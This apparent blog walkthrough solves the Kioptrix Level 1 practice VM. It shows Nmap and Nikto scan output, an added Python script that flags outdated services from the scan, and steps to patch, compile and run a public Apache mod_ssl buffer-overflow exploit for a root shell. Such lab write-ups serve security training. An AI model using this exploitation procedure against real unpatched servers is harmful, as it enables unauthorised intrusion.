This is a walkthrough for Kioptrix Level 1. Although getting root on this box is pretty straightforward, it’s a great place for those looking to get their feet wet with boot2root VMs. I actually suggest this as a starting place rather than something like Metasploitable2, which is almost overwhelming with its list of vulnerabilities. The Kioptrix Level 1 VM can be downloaded from http://vulnhub.com/entry/kioptrix-level-1-1,22/
After loading up the VM I used netdiscover -r to find its IP address, which was 192.168.2.90.
Now it’s time to use Nmap to grab info about what ports and services are available.
root@moriarty:~# nmap -sV -P0 -A 192.168.2.90

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 11:42 EDT
Nmap scan report for 192.168.2.90
Host is up (0.00069s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T08:32:06+00:00
|_Not valid after:  2010-09-26T08:32:06+00:00
|_ssl-date: 2014-08-13T19:43:04+00:00; +3h59m58s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
MAC Address: 08:00:27:C4:86:B7 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.69 ms 192.168.2.90

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.77 seconds
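The scan above already tells a defender most of what needs fixing on this host. As an added example (not part of the original walkthrough), this Python script parses Nmap normal output like the one shown, attaches the NSE script lines to their port, and flags the hygiene problems that the rest of this post goes on to use: end-of-life Apache 1.x, mod_ssl 2.8.7 or lower, SSLv2, SSHv1, TRACE and an expired certificate. The sample scan text is copied from the output above and trimmed to four ports; the check tables are my own.

```python
import re
from datetime import datetime, timezone

# Constructed sample: lines copied from the Nmap output in this walkthrough, trimmed to four ports.
NMAP_OUTPUT = """PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_Not valid after:  2010-09-26T08:32:06+00:00
| sslv2:
|   SSLv2 supported
"""
SCAN_DATE = datetime(2014, 8, 13, tzinfo=timezone.utc)  # date the scan above was run
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
BANNER_CHECKS = [  # (regex over the VERSION column, finding)
    (r"Apache httpd 1\.", "end-of-life Apache 1.x"),
    (r"mod_ssl/2\.8\.[0-7]\b", "mod_ssl 2.8.7 or lower (CVE-2002-0082)"),
]
SCRIPT_CHECKS = [  # (substring of the attached NSE output, finding)
    ("SSLv2 supported", "SSLv2 enabled"),
    ("supports SSHv1", "SSH protocol 1 enabled"),
    ("risky methods: TRACE", "HTTP TRACE enabled"),
]

def parse_ports(text):  # one record per PORT line; the '|' NSE lines that follow are attached to it
    services, current = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                       "service": m.group(4), "version": m.group(5).strip(), "scripts": []}
            services.append(current)
        elif line.startswith("|") and current is not None:
            current["scripts"].append(line.lstrip("|_ ").rstrip())
    return services

def triage(services, now=SCAN_DATE):  # returns (port, finding) tuples visible from the banners alone
    findings = []
    for s in services:
        scripts = " ".join(s["scripts"])
        findings += [(s["port"], msg) for rx, msg in BANNER_CHECKS if re.search(rx, s["version"])]
        findings += [(s["port"], msg) for needle, msg in SCRIPT_CHECKS if needle in scripts]
        exp = re.search(r"Not valid after:\s+(\S+)", scripts)  # ssl-cert script output
        if exp and datetime.fromisoformat(exp.group(1)) < now:
            findings.append((s["port"], "certificate expired " + exp.group(1)[:10]))
    return findings
```

Feeding it the full scan instead of the trimmed sample only adds the rpcbind and status lines, which match none of the checks.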
The first thing I noticed is that most of these services are pretty outdated, which is good news. The second thing that grabs my attention is the version of Apache being run. There are clearly several services here that might provide a foothold into the box, but I decided to stick with Apache since it caught my eye. I fire up Iceweasel and find a default-looking Apache page on the web server. Now to run Nikto and see what information it can gather about the web server.
root@moriarty:~# nikto -h 192.168.2.90
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.90
+ Target Hostname:    192.168.2.90
+ Target Port:        80
+ Start Time:         2014-08-13 11:44:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 7355 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time:           2014-08-13 11:44:53 (GMT-4) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
OK, so the first thing Nikto returns is:
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
I do a simple Google search to see if there are any obvious exploits that fit my needs.
Well, the first result seems to fit the bill quite well. Now I’m going to use searchsploit to see if I’ve already got this exploit locally.
root@moriarty:~# searchsploit apache openssl
Apache OpenSSL – Remote Exploit (Multiple Targets) (OpenFuck | /linux/remote/764.c
Alright, now it’s time to copy this into my /tmp/exploit directory and see what we’ve got.
Ok so the very first section gives us what we need.
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
If you try to compile this without changing the code you'll end up with a bunch of errors and issues.
Luckily the paulsec write-up is very straightforward, so here are the changes I made to get this to compile (I edited the file in vi).
1) Add these two headers:
2) Update the URL of the C file:
Search for packetstorm and replace the URL with the following
3) Install the libssl-dev library if you don't have it already:
apt-get install libssl-dev
4) Update the declaration of variables:
unsigned char *p
and change it to
const unsigned char *p, *end;
5) Compile the code and Bob's your uncle:
gcc -o exploit 764.c -lcrypto
So the exploit compiled without any issues this time. Now it’s time to move in for the kill.
root@moriarty:/tmp/exploit# ./exploit | grep -i redhat | grep "1.3.20"
This shows me that I’ve got two target options for this exploit, so I first try 0x6a, but it doesn’t quite work out.
So I try the second one, 0x6b, and decide to add a range of 40 connections for a better shot at getting this to work.
And there it is. Root access on Kioptrix Level 1. Feel free to leave feedback and questions in the comments.